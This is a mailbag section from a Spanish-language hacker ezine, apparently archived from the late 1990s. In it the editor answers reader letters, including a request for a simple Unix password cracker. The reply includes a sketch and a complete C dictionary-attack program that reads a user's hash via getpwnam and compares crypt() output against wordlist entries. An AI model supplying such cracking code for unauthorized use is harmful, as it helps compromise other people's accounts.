Copy Link
Add to Bookmark
Report

0x0D: Mails

eZine's profile picture
Published in 
Systat Security Team
 · 3 Aug 2023

En esta seccion respondemos todos los mails que nos son enviados a nuestra casilla ( syst4t@usa.net ) o por lo menos los que mas nos llamen la atencion. La verdad es que los mails que no publicamos es porque preferimos contestarlos en privado, ya que una respuesta en publico no seria algo muy educado, no pretendemos hacerle mala fama a nadie, asique si envias un mail, puedes hacerlo con confianza y puedes tener la seguridad de que nadie te molestara ni te insultara.

Tambien me gustaria aprovechar la oportunidad de decir a los otros grupos que tienen ezines o los que se dedican a criticar a lamers, creando cosas como lamerszone, la verdad es que hay tipos que se lo merecen y es cierto, por creer que lo saben todo, pero que no abusen dando mala a fama a gente que no los ha molestado como le paso a lainfeccion, la cual yo reconozco que el nivel del canal no es el mejor, pero tambien conozco a CeroAbsoluto, que es el creador de esa web y del canal, la web tampoco contiene material impresionante, pero en las conversaciones que he tenido con CeroAbsoluto me he podido dar cuenta que sabe bastante y ademas me ha contado los planes que tiene para su web y son bastante buenos, asique creo que se merece una oportunidad y no que lo bajen de un golpe con malos comentarios, la critica ademas va contra la base del hacking que dice que la informacion debe ser libre.

Y por eso yo creo que lainfeccion esta en todo el derecho de poner lo que se le ocurra en su web. No pretendo criticar a nadie, solo que creo que actuaron de mala forma.

Sé que este texto dara mucho que hablar y generara multiples opiniones sobre Systat Security Team, pero la verdad es que no me importa mucho, nadie esta obligado a visitar la web ni a leer el ezine. Y tengo todo el derecho a escribir lo que quiera en el.

z0rbas

0x01

Hola z0rbas :

Hace tiempo que me baje un texto que escribiste tu: "Passwords en UNIX", pero hasta la fecha de hoy no me lo habia leido. Queria felicirate por el excelente trabajo que has hecho, y en particular por los dos ejemplos que has traducido y comentado. En el texto comentas que no es muy dificil hacer un crackeador de passwd y que se podria hacer uno de unas 30 lineas aproximadamente; El caso es que yo uso el crackeador John The Ripper, pero me gustaria hacerme el mio propio;Me podria mirar el codigo fuente del John The Ripper, pero preferiria empezar por un crackeador un poco mas sencillo; Si dispones del codigo fuente de un crackeador de passwd para unix, por favor si puedes me lo mandas, y si no me dices donde puedo conseguirlo.

Hace mucho tiempo que no me paso por #lainfeccion @ irc.dal.net, y creo que nunca hablamos en el IRC;Si quieres comentarme o preguntarme cualquier cosa me puedes mandar un mail o quizas me puedas encontrar en el IRC: #hackindex @ irc.irc-vulcano.com.

Saludos, kdt00ls .

RESPUESTA

Hola,

Primero que nada gracias por la critica, sobre lo del crackeador, con gusto te doy una ayudita.Tomando en cuenta que tuviese un diccionario de palabras y el password encriptado, solo te queda comenzar a compararlos, y eso es precisamente lo que hace la funcion que traduci, por lo que el crackeador seria mas o menos asi:

(esto es solo un bosquejo, porque sino tendria que escribir la parte del programa que falta, la cual se puede sacar perfectamente de los ejemplos del tutorial de C)

--------------------------------------------------------------------------- 
#include <pwd.h>
#include ...

#define UPAP_AUTHNAK 0
#define UPAP_AUTHAcK 1


/* este programa chequea un usuario y password, basado en el fichero de
password(/etc/passwd) para la autentificación, también chequea si el
usuario es valido.
Retornos de la función:
UPAP_AUTHNAK : logeo fallido.
UPAP_AUTHACK : logeo exitoso.
En algunos casos la variable msg apunta a un mensaje en especial.
(Traducido por z0rbas)
*/


Static int login(usuario, passwd, msg, largomsg)
Char *usuario;
Char *password;
Char **msg;
Int *largomsg; // definición de los argumentos de la
función.
{
struct passwd *pw; // define puntero a la estructura del registro
char *epasswd; // puntero a lo que será la pass encriptada

if((pw=getpwnam(usuario))==NULL) return(UPAP_AUTHNAK);

/* se asigna el valor a la estructura apuntada por pw, con el valor del
registro del usuario correspondiente, usando la función getpwnam() y se
compara al tiro con NULL, si es verdadero, quiere decir que el usuario
no se encontró y el login se rechaza. */



if(pw->pw_passwd == '\0') return(UPAP_AUTHACK);

/* se compara el campo de password con NULL, si es verdadero, no hay
password en el campo y el logeo es aceptado, no se necesita revisar el
password */



epasswd = crypt(password, pw->pw_passwd);

/* encripta el password con la semilla del password original. */


if(strcmp(epasswd, pw->pw_passwd)) return(UPAP_AUTHNAK);

/* si son distintos los dos string( epasswd, el password
encriptado(instrucción pasada) y el password original del fichero se
rechaza el login, si a estas alturas aun no se ha rechazado, el sistema
reconoce el password como correcto */





return(UPAP_AUTHACK);
}

main(int argc, char * argv) /* yo pondria q por aqui se pasara el user */
{
/**********************************
* AQUI ESTA LA FUNCION MAIN !!! *
**********************************/


char user[30];
char pass_lista_palabras[50];
int estado;

... va probando las palabras del diccionario asi:

estado = login(user,pass_lista_palabras,"",0);

ahora ve si es correcto el password

if(estado==UPAP_AUTHAcK)
{
printf("El password para %s es %s",user,pass_lista_palabras);
exit(0)
}

si no paso esto, sigue probando ^
___|


-----------------------------------------------------------------------

Otra cosa que te puede servir es este cracker escrito por GuyBrush:

----------------------------------------------------------------------- 
// Programa que lee palabras de cualquier diccionario o texto y después de
// encriptarlas las compara.
// Copyright (c) Guybrush


#include <stdio.h>
#include <pwd.h>


char cadena[30];
char clave[30];

struct passwd *pwd;


int desencripta(char *clave, char *archivo)
{
FILE *fichero;

char *crypt(), *resp;
int cont;

if ((fichero = fopen(archivo,"r")) == NULL)
{
printf("\nError al abrir diccionario\n");
exit(0);
}

while (!feof(fichero))
{
cont = 0;

do
{
cadena[cont] = fgetc(fichero);
cont++;
} while ((cadena[cont-1] != '\n') && (cadena[cont-1] != ' ') &&
(cadena[cont-1] != ',') && (cadena[cont-1] != '.') &&
(cadena[cont-1] != ';') && (cadena[cont-1] != ':') &&
(!feof(fichero)));

cadena[cont-1] = '\x0';

resp = crypt(cadena,clave);

if (!strcmp(resp,clave))

{
printf("\a\n\n\n ==> El password es : %s <==\n\n\n",cadena);
fclose(fichero);

return 1;
}
}

fclose(fichero);

return 0;
}


main(int argc, char **argv)
{
int respuesta;
char clave[15];

if (argc == 3)
{
if (!(pwd = getpwnam(argv[1])))
{
printf("\nUsuario desconocido.\n\n");
exit(-1);
}

strcpy(clave,pwd->pw_passwd);

endpwent();

printf("\n\nBuscando palabras en el diccionario ...\n\n");

respuesta = desencripta(clave,argv[2]);

if (respuesta != 1)
printf("\n\n\nPalabra no encontrada en el diccionario.\n\n\n");
}
else
printf("\n\nUsar: %s <usuario> <diccionario donde buscar>\n\n",argv[0]);
}
------------------------------------------------------------------------

Es bastante simple, por lo que no deberias tener dificultades con el.

Espero que esto te haya servido, si no enviame un mail y vemos que podemos hacer.

Saludo
z0rbas

0x02

Hola estoy bajando archivo de su pagina y no puedo abrir ninguno por que los desconoce la extension, yo uso windows98.


GRACIAS MEMO

Envia gratis tus postales musicales de Navidad desde http://www.mixmail.com

RESPUESTA

Bueno en la epoca que visitaste nuestra web, todos los archivos eran .c y esos son codigos de fuente que a lo mas en windows puedes darle la utlidad de abrirlos ocn el block de notas y estudiarlos. En linux puedes convertirlos en ejecutables, para saber como hacer esto, lee el articulo de UNIX/Linux un poco mas arriba. En todo caso en este momento tambien tenemos archivos para windows, aunque la mayoria para NT/2K y los que corren en 98, no se comparan mucho con algunos similar para linux.

Saludo
z0rbas

0x03

Felicitaciones por el ezine.

Me interesaria, si pueden mandarmelo por email cada vez que lo publican. La direccion de su site no funciona http://tlateam.virtualave.net mendenme otra direccion donde conseguir los ezines Consejo lo podrian poner numero a los ezines.

Saludos....

Yo tengo este INDICE: archivo tla01.txt

@ Saludo
Bienvenida a nuestro E-Zine. (por z0rbas)

@ Passwords en Unix
Texto que trata sobre los passwords en unix, metodo de encriptacion uso de estos en algunos programas y otros ejemplos. (por z0rbas)

@ Explotar NetBIOS desde Linux
Texto para entrar en otros PCs por NetBIOS (por DrAkO)

@ Explotar NetBIOS desde Windows
Este texto explica un poco lo mismo que el texto escrito por DrAkO, pero para aquellos que usan windows.Bastante resumido. (Por z0rbas)

@ Tutorial de C
Texto introductorio al lenguaje C, bastante completo, basico para lo que vendra en los proximos numeros. (por z0rbas)

@ Culrura Informatica
Esta seccion estara presente en todos nuestros numeros y la idea es ir profundizando en temas que no se encuentran en cualquier parte los proximos numeros, seguiremos sobre el mismo tema(Sistemas operativos), el texto lo hice muy corto y resumido, ya que segun lo que hable con unos colegas en el IRC este tema no interesa mucho en general, ya para el proximo numero hablaremos un poco sobre virus, en todo caso si estas interesado, avisa, ya que si hay suficiente gente interesada, seguiriamos desarrollando este tema.
(por z0rbas)

@ Exploits
En este numero veremos algunos exploits simples, y los analizaremos para el proximo terminare el texto de exploits para comenzar a escribir nuestros propios exploits.

@ Agradecimientos y despedida
No necesita explicacion creo... (por z0rbas)

RESPUESTA

Muchas gracias primero que nada, con lo de la web y el ezine, la web esta ahora en www.systat.net y el ezine ha partido de cero, o sea, todo de nuevo. Espero que te guste la nueva ;)

Saludos z0rbas

FIN

Bueno aun tenemos poquitos mails, esperamos empezar a recibir algunos mails mas. Tenemos 3 mas en la casilla, pero no son dignos de publicar ;)

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT